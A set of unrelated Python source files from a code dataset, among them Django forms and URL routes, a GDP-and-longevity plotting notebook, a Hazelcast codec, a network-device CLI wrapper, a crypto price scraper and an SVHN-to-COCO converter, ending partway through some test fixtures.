2\n# Great! By default, I get 3 extra forms. That's a lot for a single view since they're big forms. Can you change it so I only get 1 extra?\n\nfrom django import forms\n\nfrom . import models\nfrom products.models import Product\n\n\nclass ReviewForm(forms.ModelForm):\n class Meta:\n model = models.Review\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date')\n\nReviewFormset = forms.inlineformset_factory(\n models.Product,\n models.Review,\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date'),\n extra = 1\n)\n","sub_path":"team_treehouse/python_web_tech_degree/unit_7/django_forms/topic_4.py","file_name":"topic_4.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"478864018","text":"#Calculate Average values and plot\n##1900 - 1980\n# International average gdp\namoy_gdp = []\nfor i in range(len(avaleurs_gdp_nonenull)):\n amoy_gdp.append((round(np.sum(avaleurs_gdp_nonenull[i])/len(alst_gdp_nonenull)))) \n#International average Life expectancy\namoy_lifeexpectancy = []\nfor i in range(len(avaleurs_life_expectancy_nonenull)):\n amoy_lifeexpectancy.append(np.sum(avaleurs_life_expectancy_nonenull[i])/len(alst_longevity_nonenull))\n\n\nfor i in tqdm_notebook(range(200), desc ='loop'):\n sleep(0.01)\n\n#### fig. 1 Evolution Longevity vs GDP per years \n# a. International average Longevity over time (#Left figure)\n#-------------[1900 - 1978]--------------\nnrows = 1\nncols = 2\nfig = plt.figure(figsize=(18,7))\nx = alst_years\ny = amoy_lifeexpectancy\nz = amoy_gdp\nax1 = fig.add_subplot(nrows, ncols, 1)\nax1.plot(x, y, color = 'blue', label = 'International average longevity', linewidth=2)\nax1.set_aspect(1./ax1.get_data_ratio())\nplt.yticks(np.arange(min(y), max(y)+2, 2))\nplt.ylabel('Average longevity for years [1900-1980]')\nplt.xlabel('Time [1900 - 1980]')\nplt.legend(loc=\"upper left\")\nespace2 = ax1.twinx()\nespace2.plot(x, z, color = 'green', label = 'International average GDP', linewidth=2)\nplt.xlabel('Time [1900-1980]')\nplt.ylabel('Average GDP')\nplt.xticks(np.arange(min(x), max(x)+2, 5))\nplt.legend(loc=\"center left\")\n#-------------[1900 - 1980]--------------\n#b. Preston curve GDP - Income (#Right figure)\nax2 = fig.add_subplot(nrows, ncols, 2)\nx2 = amoy_gdp\ny2 = amoy_lifeexpectancy\nax2.scatter(x2,y2,color='blue',edgecolor='none',label = 'International average Longevity per GDP',linewidth=2)\nax2.set_aspect(1./ax2.get_data_ratio())\nz2 = np.polyfit(x2, y2,2)\np = np.poly1d(z2) ## Thanks Stackoverflow https://stackoverflow.com/questions/18767523/fitting-data-with-numpy\npylab.plot(x2,p(x2),\"r--\", label = 'Trend line')\nplt.ylabel('International average longevity [1900-1980]')\nplt.yticks(np.arange(min(y2)-1, max(y2)+2, 2))\nplt.xlabel('International average GDP per year [1900-1980]')\nplt.legend(loc=\"upper left\")\nplt.show()\n\nprint('1.1/ Longevity progress - [1900 - 1980]\\na) For the period between {} - {}, the international average life expectancy has raised by +{}%'.format(alst_years[15],alst_years[35],round(((amoy_lifeexpectancy[35] - amoy_lifeexpectancy[15])/amoy_lifeexpectancy[15])*100, 1)))\nprint('b) For the period between {} - {}, the international average life expectancy has raised by +{}%'.format(alst_years[45],alst_years[65],round(((amoy_lifeexpectancy[65] - amoy_lifeexpectancy[45])/amoy_lifeexpectancy[45])*100, 1)))\nprint('c) For the period between {} - {}, the international average life expectancy has raised by +{}%'.format(alst_years[65],alst_years[75],round(((amoy_lifeexpectancy[75] - amoy_lifeexpectancy[65])/amoy_lifeexpectancy[65])*100, 1)))\nprint('1.2/ Income progress [1900 - 1980]\\na) For the period between {} - {}, the international average income ppp varied by +{}%'.format(alst_years[15],alst_years[35],round(((amoy_gdp[35] - amoy_gdp[15])/amoy_gdp[15])*100, 1)))\nprint('b) For the period between {} - {}, the international average income ppp varied by +{}%'.format(alst_years[45],alst_years[65],round(((amoy_gdp[65] - amoy_gdp[45])/amoy_gdp[45])*100, 1)))\nprint('c) For the period between {} - {}, the international average income ppp varied by +{}%'.format(alst_years[65],alst_years[75],round(((amoy_gdp[75] - amoy_gdp[65])/amoy_gdp[65])*100, 1)))\nprintmd('\\nThe rapide increase in life expectancy that happend in the mid-40s could be explained with the discovery of Peniciline and its production that increased by early 1944. However, the relationship between living standard as captured and income were a dominant determinant of mortality ')\n\n\n#Calculate Average values and plot\n\n##1980 - 2015 \n#International average gdp per year \nmoy_gdp = []\nfor i in range(len(valeurs_gdp_nonenull)):\n moy_gdp.append((round(np.sum(valeurs_gdp_nonenull[i])/len(lst_gdp_nonenull)))) \n#International average Life expectancy\nmoy_lifeexpectancy = []\nfor i in range(len(valeurs_life_expectancy_nonenull)):\n moy_lifeexpectancy.append(np.sum(valeurs_life_expectancy_nonenull[i])/len(lst_longevity_nonenull))\n##########################################################################################################################\n##### fig. 2 Evolution Longevity vs GDP per years \n# a. International average Longevity over time \n\nfig = plt.figure(figsize=(18, 7))\nnrows = 1\nncols = 2\n#-------------[1980 - 2015]--------------\n# a. Internation average Longevity over time (#left figure)\nax1 = fig.add_subplot(nrows, ncols, 1)\nx1 = lst_years\ny1= moy_lifeexpectancy\nz1 = moy_gdp\nax1.plot(x1, y1, color = 'blue', label = 'International average longevity', linewidth=2)\nplt.yticks(np.arange(min(y1), max(y1)+2, 2))\nplt.xlabel('Time [1980-2015]')\nplt.ylabel('Average longevity for years [1980-2015]')\nplt.legend(loc=\"upper left\")\nespace1 = ax1.twinx()\nespace1.plot(x1, z1, color = 'green', label = 'International average GDP', linewidth=2)\nplt.ylabel('Average GDP')\nplt.xticks(np.arange(min(x1), max(x1)+2, 5))\nplt.legend(loc=\"center left\")\n#-------------[1980-2015]--------------\n#b. Preston curve GDP - Income (#right figure)\nax2 = fig.add_subplot(nrows, ncols, 2)\nx2 = moy_gdp\ny2 = moy_lifeexpectancy\nax2.scatter(x2,y2,color='blue',edgecolor='none', label = 'International average longevity per GDP', linewidth=2)\nax2.set_aspect(1./ax2.get_data_ratio()) # Help of http://people.duke.edu/~ccc14/pcfb/numpympl/MatplotlibBarPlots.html\nz2 = np.polyfit(x2, y2,2)\np = np.poly1d(z2) ## Thanks Stackoverflow https://stackoverflow.com/questions/18767523/fitting-data-with-numpy\npylab.plot(x2,p(x2),\"r--\", label = 'Trend line')\nplt.xlabel('International average GDP per year [1980-2015]')\nplt.ylabel('International average longevity [1980-2015]')\nplt.yticks(np.arange(min(y2), max(y2), 2))\nplt.legend(loc=\"upper left\")\nplt.show()\n\n\nprint('2.1/ Longevity progress [1980 - 2015]\\na) For the period between {} - {}, the international average life expectancy has raised by {}%'.format(lst_years[0],lst_years[10], round(((moy_lifeexpectancy[10] - moy_lifeexpectancy[0])/moy_lifeexpectancy[0])*100, 1)))\nprint('b) For the period between {} - {}, the international average life expectancy has raised by {}%'.format(lst_years[10],lst_years[20], round(((moy_lifeexpectancy[20] - moy_lifeexpectancy[10])/ moy_lifeexpectancy[10])*100, 1)))\nprint('c) For the period between {} - {}, the international average life expectancy raised by {}%'.format(lst_years[20],lst_years[30], round(((moy_lifeexpectancy[30] - moy_lifeexpectancy[20])/ moy_lifeexpectancy[20])*100, 1)))\nprint('2.2/ Income progress [1980 - 2015]\\na) For the period between {} - {}, the international average income ppp varied by {}%'.format(lst_years[0],lst_years[10], round(((moy_gdp[10] - moy_gdp[0])/moy_gdp[0])*100, 1)))\nprint('b) For the period between {} - {}, the international average income ppp varied by {}%'.format(lst_years[10],lst_years[20], round(((moy_gdp[20] - moy_gdp[10])/ moy_gdp[10])*100, 1)))\nprint('c) For the period between {} - {}, the international average income ppp varied by {}%'.format(lst_years[20],lst_years[30], round(((moy_gdp[30] - moy_gdp[20])/ moy_gdp[20])*100, 1)))\nprint('\\nThe Preston curve revisited using the International average values to measure the responsiveness of Longevity after a change in the GDP, indicates a shift in the curve that has declined in magnitude since 1960. It means that at a certain level of income, there is less and less impact on the longevity.')\n","sub_path":"python_code/exploratory_data_analysis1.py","file_name":"exploratory_data_analysis1.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"101338730","text":"from hazelcast.serialization.data import *\nfrom hazelcast.serialization.bits import *\nfrom hazelcast.protocol.client_message import ClientMessage\nfrom hazelcast.protocol.custom_codec import *\nfrom hazelcast.protocol.codec.transaction_message_type import *\n\nREQUEST_TYPE = TRANSACTION_COMMIT\nRESPONSE_TYPE = 100\nRETRYABLE = False\n\n\ndef calculate_size(transaction_id, thread_id):\n \"\"\" Calculates the request payload size\"\"\"\n data_size = 0\n data_size += calculate_size_str(transaction_id)\n data_size += LONG_SIZE_IN_BYTES\n return data_size\n\n\ndef encode_request(transaction_id, thread_id):\n \"\"\" Encode request into client_message\"\"\"\n client_message = ClientMessage(payload_size=calculate_size(transaction_id, thread_id))\n client_message.set_message_type(REQUEST_TYPE)\n client_message.set_retryable(RETRYABLE)\n client_message.append_str(transaction_id)\n client_message.append_long(thread_id)\n client_message.update_frame_length()\n return client_message\n\n\ndef decode_response(client_message):\n \"\"\" Decode response from client message\"\"\"\n parameters = dict()\n return parameters\n\n\n\n","sub_path":"hazelcast/protocol/codec/transaction_commit_codec.py","file_name":"transaction_commit_codec.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"478809641","text":"import re\nimport time\nfrom cafe.core.logger import CLogger as Logger\nfrom cafe.topology.topo import get_topology\nfrom cafe.core.signals import EXA_SESSION_ERROR\nfrom cafe.resp.response_map import ResponseMap\nfrom cafe.core.db import teststep\n\nlogger = Logger(__name__)\ndebug = logger.debug\nerror = logger.error\ndebug(\"importing module %s\" % __name__)\n\n\ndef get_exa_class(name, session, session_type=\"ssh\", release=None):\n return CalixExaBase(name, session, session_type, release)\n\nclass CalixExaBase(object):\n \"\"\"\n base class of EXA interfaces\n \"\"\"\n LOGIN_PROMPT = \"login:\\s+$\"\n PASSWORD_PROMPT = \"assword:\\s+$\"\n EXA_PROMPT = \"\\S+#\\s*$\"\n BASH_PROMPT = \"\\S+@\\S+:\\S+#\\s+$\"\n CONFIG_PROMPT = \"\\S+\\(config\\)#\\s+$\"\n\n def __init__(self, name, session, session_type=\"ssh\", release=None):\n \"\"\"\n \"\"\"\n self.name = name\n self.session = session\n self.session.prompt.extend([self.LOGIN_PROMPT, self.PASSWORD_PROMPT, self.EXA_PROMPT,\n self.BASH_PROMPT, self.CONFIG_PROMPT])\n self.session_type = session_type\n self.release = release\n\n def command(self, cmd=\"\", timeout=30):\n if self.session_type == \"ssh\":\n r = self.session.expect_prompt(timeout=0)\n\n self.session.write(cmd)\n # return tuple (prompt index, , text)\n r = self.session.expect_prompt(timeout=timeout)\n\n if \"error:\" in r[2]:\n status = False\n else:\n status = True\n if r[0] < 0:\n return {\"status\": status, \"prompt\": None, \"response\": r[2]}\n else:\n return {\"status\": status, \"prompt\": r[1].group(), \"response\": r[2]}\n\n def __prompt_matches(self, prompt, regex):\n ret = True\n\n if (prompt is None) or (re.match(regex, prompt) is None):\n ret = False\n\n return ret\n\n def login(self):\n if self.session_type != \"telnet\":\n self.session.login()\n\n prompt = self.command(cmd=\"\\x03\")['prompt']\n self.cli(prompt)\n\n def cli(self, prompt):\n # print(\"[[[[[%s|%s]]]]]\" % (prompt, self.EXA_PROMPT))\n if self.__prompt_matches(prompt, self.CONFIG_PROMPT):\n self.command(\"top\")\n next_prompt = self.command(cmd=\"exit\")['prompt']\n elif self.__prompt_matches(prompt, self.LOGIN_PROMPT):\n next_prompt = self.command(cmd=self.session.user)['prompt']\n elif self.__prompt_matches(prompt, self.PASSWORD_PROMPT):\n next_prompt = self.command(cmd=self.session.password)['prompt']\n elif self.__prompt_matches(prompt, self.BASH_PROMPT):\n next_prompt = self.command(cmd=\"cli\")['prompt']\n elif self.__prompt_matches(prompt, self.EXA_PROMPT):\n return\n else:\n error(\" - attempt to get to CLI level resulted in an undefined state. Prompt: %s\" % prompt)\n return\n\n self.cli(next_prompt)\n\n def in_known_state(self, prompt):\n known_states = [self.LOGIN_PROMPT, self.BASH_PROMPT, self.CONFIG_PROMPT, self.EXA_PROMPT, self.PASSWORD_PROMPT]\n\n match = False\n\n for i in known_states:\n if self.__prompt_matches(prompt, i):\n match = True\n break\n\n return match\n\n def reload(self):\n prompt = self.command(cmd=\"\\x03\")['prompt']\n self.cli(prompt)\n print(self.command(\"reload\"))\n print(self.command(\"y\"))\n\n reboot_successful = True\n\n if self.session_type == \"telnet\":\n num_retries = 15\n wait_time = 30\n\n while (not self.in_known_state(self.command(timeout=wait_time)['prompt'])) and (num_retries > 0):\n time.sleep(wait_time)\n num_retries -= 1\n\n if num_retries <= 0:\n reboot_successful = False\n elif self.session_type == \"ssh\":\n num_retries = 20\n wait_time = 20\n\n time.sleep(5)\n\n disconnected = True\n\n initial_disconnect = False\n\n while disconnected and (num_retries >= 0):\n try:\n self.login()\n disconnected = False\n except Exception as e:\n #print(e.message)\n initial_disconnect = True\n\n time.sleep(wait_time)\n # print(\"retries left: %s\" % num_retries)\n num_retries -= 1\n\n reboot_successful = not disconnected\n\n if reboot_successful:\n c = self.command(cmd=\"\\x03\")\n #print(c)\n prompt = c['prompt']\n self.cli(prompt)\n debug(\" - reloaded successfully\")\n else:\n error(\" - failed to reload device!\")\n\n def reconnect(self):\n reboot_successful = True\n\n if self.session_type == \"telnet\":\n num_retries = 15\n wait_time = 30\n\n while (not self.in_known_state(self.command(timeout=wait_time)['prompt'])) and (num_retries > 0):\n time.sleep(wait_time)\n num_retries -= 1\n\n if num_retries <= 0:\n reboot_successful = False\n elif self.session_type == \"ssh\":\n num_retries = 20\n wait_time = 20\n\n time.sleep(5)\n\n disconnected = True\n\n initial_disconnect = False\n\n while disconnected and (num_retries >= 0):\n try:\n self.login()\n disconnected = False\n except Exception as e:\n #print(e.message)\n initial_disconnect = True\n\n time.sleep(wait_time)\n # print(\"retries left: %s\" % num_retries)\n num_retries -= 1\n\n reboot_successful = not disconnected\n\n if reboot_successful:\n c = self.command(cmd=\"\\x03\")\n #print(c)\n prompt = c['prompt']\n self.cli(prompt)\n debug(\" - reloaded successfully\")\n else:\n error(\" - failed to reload device!\")\n\n @teststep(\"get_interface_craft\")\n def get_interface_craft(self, intf):\n # E5-520# show interface craft 1 | nomore\n # interface craft 1\n # status\n # name \"craft 1\"\n # admin-state enable\n # oper-state unknown\n # mac-addr 00:02:5D:BA:8D:B7\n # net-config-type static\n # ip-address 10.243.19.213\n # ip-mask 255.255.252.0\n # ip-gateway 10.243.16.1\n # craft-cntrs\n # rx-pkts 586110\n # rx-octets 170323600\n # tx-pkts 71836\n # tx-octets 14459880\n # dhcp-server disable\n #(0, , text)\n r = self.command(cmd=\"show interface craft %s | nomore\" % str(intf))\n resp = r[\"response\"]\n m = ResponseMap(resp)\n d = m.parse_key_value_pairs(start_line=1)\n return d\n\n\n\n\n\n\n\n\n\n\n","sub_path":"equipment/calix/exa.py","file_name":"exa.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"374538990","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import include, path\n\nfrom . import views\nfrom .forms import LoginForm\n\nurlpatterns = [\n\tpath('login', auth_views.login, {'template_name':'accounts/login.html', \n\t\t'authentication_form': LoginForm}, name='login'),\n\tpath('logout', auth_views.logout, {'next_page': '/'}, name='logout'),\n\tpath('signup', views.signup, name='signup'),\n\tpath('guests', views.GuestList.as_view(), name='guest_list'),\n\tpath('admin', views.AdminList.as_view(), name='admin_list'),\n\tpath('user//edit', views.EditUser.as_view(), name='edit_user'),\n\tpath('user/', views.UserProfile.as_view(), name='user_profile'),\n]","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"38619507","text":"\"\"\"Boolean field class & utilities.\"\"\"\nfrom gettext import gettext as _\nfrom typing import Any\n\nfrom pofy.core.errors import ErrorCode\nfrom pofy.core.constants import UNDEFINED\nfrom pofy.fields.base_field import ScalarField\nfrom pofy.core.interfaces import ILoadingContext\n\n\nclass BoolField(ScalarField):\n \"\"\"Boolean YAML object field.\"\"\"\n\n def _convert(self, context: ILoadingContext) -> Any:\n node = context.current_node()\n true_values = [\n 'y', 'Y', 'yes', 'Yes', 'YES',\n 'true', 'True', 'TRUE',\n 'on', 'On', 'ON'\n ]\n false_values = [\n 'n', 'N', 'no', 'No', 'NO',\n 'false', 'False', 'FALSE'\n 'off', 'Off', 'OFF'\n ]\n\n value = node.value\n if value in true_values:\n return True\n\n if value in false_values:\n return False\n\n context.error(\n ErrorCode.VALUE_ERROR,\n _('Boolean value should be one of {}'),\n ', '.join(true_values + false_values)\n )\n\n return UNDEFINED\n","sub_path":"pofy/fields/bool_field.py","file_name":"bool_field.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"573055137","text":"import pickle\nfrom pathlib import Path\nfrom datetime import datetime, date\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n_coinmarketcap_data_filename = \"tmp/{}-coinmarketcap-data.pickle\"\n_pricehistory_filename = \"tmp/{}-pricehistory.pickle\"\n\n\ncurrency2symbolmap = {\n \"bitcoin\": \"XXBT\",\n \"ethereum\": \"XETH\",\n \"stellar\": \"XXLM\"\n}\n\n\ndef get_data_from_coinmarketcap(currency):\n r = requests.get(f\"https://coinmarketcap.com/currencies/{currency}/historical-data/?start=20140101&end=20180423\")\n with open(_coinmarketcap_data_filename.format(currency), \"wb\") as f:\n pickle.dump(r, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_data(currency):\n filename = _coinmarketcap_data_filename.format(currency)\n if not Path(filename).exists():\n print(f\"Didn't find data file for {currency}, downloading...\")\n get_data_from_coinmarketcap(currency)\n with open(filename, \"rb\") as f:\n return pickle.load(f)\n\n\ndef parse_table(doc):\n soup = BeautifulSoup(doc, 'html.parser')\n tables = soup.find_all(\"table\")\n\n headers = [el.text.lower() for el in tables[0].find_all(\"th\")]\n rows = []\n\n for row in tables[0].find_all(\"tr\"):\n cells = [el.text for el in row.find_all(\"td\")]\n if len(cells) == len(headers):\n rows.append({k: v for k, v in zip(headers, cells)})\n elif cells:\n print(f\"Incomplete row: {cells}\")\n\n d = {datetime.strptime(r[\"date\"], \"%b %d, %Y\").date(): r for r in rows}\n for k, v in d.items():\n v.pop(\"date\")\n v.pop(\"market cap\")\n d[k] = {ohlc: float(d[k][ohlc].replace(\",\", \"\")) for ohlc in d[k]}\n return d\n\n\ndef _save_table(currency, data):\n with open(_pricehistory_filename.format(currency2symbolmap[currency]), \"wb\") as f:\n pickle.dump(data, f)\n print(f\"Price history for {currency} saved!\")\n\n\ndef test_everything():\n data = load_data(\"bitcoin\")\n tablebtc = parse_table(data.text)\n\n assert all(k in tablebtc[date(2017, 1, 1)] for k in [\"open\", \"high\", \"low\", \"close\"])\n\n data = load_data(\"ethereum\")\n tableeth = parse_table(data.text)\n\n assert tablebtc[date(2017, 1, 1)][\"open\"] != tableeth[date(2017, 1, 1)][\"open\"]\n\n\nif __name__ == \"__main__\":\n # get_data(\"bitcoin\")\n for currency in [\"bitcoin\", \"ethereum\", \"stellar\"]:\n print(f\"Getting price history for {currency}...\")\n data = load_data(currency)\n table = parse_table(data.text)\n _save_table(currency, table)\n\n # print(data.text)\n","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"646054205","text":"import serial\nimport pickle\n\nframe = bytearray()\ndata = list()\n\nBYTES_TO_READ = 2000\nlog_name = \"/home/hkeene/pool/aqualogic/playground/logs/raw.bin\"\n\nif __name__ == '__main__':\n\n ser = serial.Serial(\n port = '/dev/ttyUSB0',\\\n baudrate = 19200)\n print(\"Connected to: \" + ser.portstr)\n\n #Prime the prev for the first time loop\n read = ser.read(BYTES_TO_READ)\n with open (log_name, \"wb\") as fp:\n pickle.dump(read, fp)\n\n ser.close()\n","sub_path":"playground/save_raw.py","file_name":"save_raw.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"648315120","text":"# -*- coding: utf-8 -*-\nimport random as r\nimport os\nfrom PIL import Image\nimport h5py\nimport json\n\n\ntrain_folder = \"train\"\ntrainImgIDSet = set()\nerrorImgIDSet = set()\ncoco_dict = {\n \"images\": [],\n \"annotations\": [],\n \"categories\": [{\"id\": i, \"name\": \"{}\".format(i % 10)} for i in range(1, 11)],\n}\n\nval_coco_dict = {\n \"images\": [],\n \"annotations\": [],\n \"categories\": [{\"id\": i, \"name\": \"{}\".format(i % 10)} for i in range(1, 11)],\n}\n\nerror_coco_dict = {\n \"images\": [],\n \"annotations\": [],\n \"categories\": [{\"id\": i, \"name\": \"{}\".format(i % 10)} for i in range(1, 11)],\n}\n\nfor root, dirs, files in os.walk(train_folder):\n for f in files:\n name_cut = f.split(\".\")\n if name_cut[-1] == \"png\":\n im = Image.open(os.path.join(root, f))\n width, height = im.size\n temp_dict = {\n \"file_name\": f,\n \"height\": height,\n \"width\": width,\n \"id\": int(name_cut[0]),\n }\n if r.randint(0, 33402) > 1000:\n coco_dict[\"images\"].append(temp_dict)\n trainImgIDSet.add(int(name_cut[0]))\n else:\n val_coco_dict[\"images\"].append(temp_dict)\n if r.randint(0, 33402) < 100:\n error_coco_dict[\"images\"].append(temp_dict)\n errorImgIDSet.add(int(name_cut[0]))\n\n\ndef get_name(index, hdf5_data):\n name = hdf5_data[\"/digitStruct/name\"]\n return \"\".join([chr(v[0]) for v in hdf5_data[name[index][0]][()]])\n\n\ndef get_bbox(index, hdf5_data):\n attrs = {}\n item = hdf5_data[\"digitStruct\"][\"bbox\"][index].item()\n for key in [\"label\", \"left\", \"top\", \"width\", \"height\"]:\n attr = hdf5_data[item][key]\n values = (\n [hdf5_data[attr[()][i].item()][()][0][0] for i in range(len(attr))]\n if len(attr) > 1\n else [attr[()][0][0]]\n )\n attrs[key] = values\n return attrs\n\n\ndef img_boundingbox_data_constructor(mat_file):\n f = h5py.File(mat_file, \"r\")\n print(\"image bounding box data construction starting...\")\n for j in range(f[\"/digitStruct/bbox\"].shape[0]):\n row_dict = get_bbox(j, f)\n for i in range(len(row_dict[\"label\"])):\n temp_dict = {\n \"area\": row_dict[\"width\"][i] * row_dict[\"height\"][i],\n \"iscrowd\": 0,\n \"image_id\": int(get_name(j, f).split(\".\")[0]),\n \"bbox\": [\n row_dict[\"left\"][i],\n row_dict[\"top\"][i],\n row_dict[\"width\"][i],\n row_dict[\"height\"][i],\n ],\n \"category_id\": int(row_dict[\"label\"][i]),\n \"id\": j,\n }\n if int(get_name(j, f).split(\".\")[0]) in trainImgIDSet:\n coco_dict[\"annotations\"].append(temp_dict)\n else:\n val_coco_dict[\"annotations\"].append(temp_dict)\n if int(get_name(j, f).split(\".\")[0]) in errorImgIDSet:\n error_coco_dict[\"annotations\"].append(temp_dict)\n print(\"finished image bounding box data construction...\")\n\n\nbbox_df = img_boundingbox_data_constructor(\n os.path.join(train_folder, \"digitStruct.mat\")\n)\nwith open(\n os.path.join(train_folder, \"train_data_processed.json\"), \"w\", encoding=\"utf-8\"\n) as f:\n json.dump(coco_dict, f, ensure_ascii=False)\n\nwith open(\n os.path.join(train_folder, \"val_data_processed.json\"), \"w\", encoding=\"utf-8\"\n) as f:\n json.dump(val_coco_dict, f, ensure_ascii=False)\n\nwith open(\n os.path.join(train_folder, \"error_data_processed.json\"), \"w\", encoding=\"utf-8\"\n) as f:\n json.dump(error_coco_dict, f, ensure_ascii=False)\n","sub_path":"to_coco_format.py","file_name":"to_coco_format.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"413176396","text":"from Tkinter import *\nfrom tkColorChooser import askcolor\nimport json\n\ntry:\n\tf = open(\"../assets/settings.json\")\nexcept IOError:\n\tf = open(\"assets/settings.json\")\ndecoder = json.JSONDecoder()\n\ndict = decoder.decode(f.read())\n\nf.close()\n\nwidth =dict[\"width\"]\nheight=dict[\"height\"]\n\ndef error(message):\n\terror = Tk()\n\terror.wm_title(\"Rapyd Error!\")\n\tlbl = Label(error,text=message)\n\tlbl.pack()\n\terror.mainloop()\n\ndef getColor():\n\tcolor =(dict[\"color\"][0], dict[\"color\"][1], dict[\"color\"][2])\t\n\n\tnewcolor = askcolor(color=color)\n\tif (newcolor[0]!=None):\n\t\tcolor = newcolor[0]\n\n\tdict[\"color\"][0] = color[0]\n\tdict[\"color\"][1] = color[1]\n\tdict[\"color\"][2] = color[2]\n\ndef aboutCallback():\n\tabout = Tk()\n\tabout.wm_title(\"About Rapyd v0.1\")\n\tlbl = Label(about, text=\"Rapyd v0.1 - by Jed Stevens\\nEst. 2015\")\n\taddr = Label(about, text=\"Find more at github.com/jedStevens/rapyd\")\n\tlbl.pack()\n\taddr.pack()\n\tabout.mainloop()\n\ndef saveCallback():\n\ttry:\n\t\tdict[\"width\"] = int(widthEntry.get())\n\t\tdict[\"height\"] = int(heightEntry.get())\n\texcept ValueError:\n\t\terror(\"Invalid Screen Size!\")\n\t\treturn\n\tencoder = json.JSONEncoder()\n\ttry:\n\t\tf = open(\"../assets/settings.json\", 'w')\n\texcept IOError:\n\t\tf = open(\"assets/settings.json\", 'w')\n\tf.write(encoder.encode(dict))\n\tf.close()\n\ndef exitCallback():\n\troot.quit()\n\nroot = Tk()\nroot.wm_title(\"Rapyd Settings\")\n\nmenu = Menu(root)\nroot.config(menu=menu)\n\nfilemenu = Menu(menu)\nmenu.add_cascade(label=\"File\", menu=filemenu)\nfilemenu.add_command(label=\"Save\", command=saveCallback)\nfilemenu.add_separator()\nfilemenu.add_command(label=\"Exit\", command=exitCallback)\n\nhelpmenu = Menu(menu)\nmenu.add_cascade(label=\"Help\", menu=helpmenu)\nhelpmenu.add_command(label=\"About\", command=aboutCallback)\n\nwidthLbl = Label(root, text=\"Screen Width: \")\nwidthLbl.grid(row=0,column=0,columnspan=2)\n\nwidthEntry = StringVar()\nwidthEntry.set(dict[\"width\"])\nwidthBox = Entry(root, textvariable=widthEntry)\nwidthBox.grid(row=0,column=3,columnspan=2)\n\nheightLbl = Label(root, text=\"Screen Height: \")\nheightLbl.grid(row=1, column=0, columnspan=2)\n\nheightEntry = StringVar()\nheightEntry.set(dict[\"height\"])\nheightBox = Entry(root, textvariable=heightEntry)\nheightBox.grid(row=1, column=3,columnspan=2)\n\ncolorLbl = Label(root, text=\"Fill Color\")\ncolorLbl.grid(row=2,column=0,columnspan=2)\n\ncolorBtn = Button(text=\"Choose Color\", command=getColor)\ncolorBtn.grid(row=2,column=2,columnspan=2)\n\nroot.mainloop()\n","sub_path":"editor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"598289941","text":"#!/usr/bin/python3\nfrom Language import Language\nfrom Requirement import Requirement\n \ndef main():\n languages = Language()\n requirements = Requirement(languages.language_dict)\n while True:\n language_name = languages.set_language_name()\n languages.write_dict_language()\n while True:\n requirements.set_requirement_name(language_name)\n requirements.write_requirements_name()\n print('Czy chcesz wyjść? T/N')\n c = input()\n if c == 'T' or c == 't':\n break\n elif c == 'N' or c == 'n':\n continue\n else:\n print('Coś poszło nie tak.')\n print('Czy chcesz wyjść? T/N')\n c = input()\n if c == 'T' or c == 't':\n break\n elif c == 'N' or c == 'n':\n continue\n else:\n print('Coś poszło nie tak.')\n \nif __name__ == '__main__':\n main()\n","sub_path":"projekty_cwiczeniowe-master/RozmowaKwalifikacyjna/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"418422795","text":"import os\nimport collections\nimport operator\nimport shutil\nimport datetime\nimport itertools\nfrom email.mime.multipart import MIMEMultipart\nfrom unittest.mock import patch, Mock, PropertyMock\nfrom egcg_core.config import cfg\nfrom tests import TestProjectManagement, NamedMock\nfrom bin import deliver_reviewed_data as d\n\nsample_templates = {\n 'process_id1': {\n 'name': 'p1sample%s',\n 'nb_sample': 4,\n 'already_delivered_samples': [3, 4],\n 'samples': {\n 'project_id': 'project1',\n 'user_sample_id': 'p1_user_s_id%s',\n 'species_name': 'Homo sapiens',\n 'useable': 'yes',\n 'required_yield': 120000000000,\n 'required_coverage': 30,\n 'aggregated': {\n 'clean_reads': 39024000,\n 'yield_in_gb': 127,\n 'yield_q30_in_gb': 102,\n 'pc_q30': 85.2,\n 'pc_mapped_reads': 99.1,\n 'pc_duplicate_reads': 16.4,\n },\n 'coverage': {'mean': 35},\n\n },\n 'lims/samples': {\n 'Delivery': 'merged',\n 'Total DNA(ng)': 2000\n },\n 'lims/status/sample_status': {\n 'library_type': 'pcrfree',\n 'started_date': '2017-08-02T11:25:14.659000'\n },\n 'run_elements': [\n {\n 'run_element_id': 'run1_el_s%s_id1',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project1',\n 'lane': 1,\n 'useable': 'yes'\n },\n {\n 'run_element_id': 'run1_el_s%s_id2',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project1',\n 'lane': 2,\n 'useable': 'yes'\n }\n ]\n },\n 'process_id2': {\n 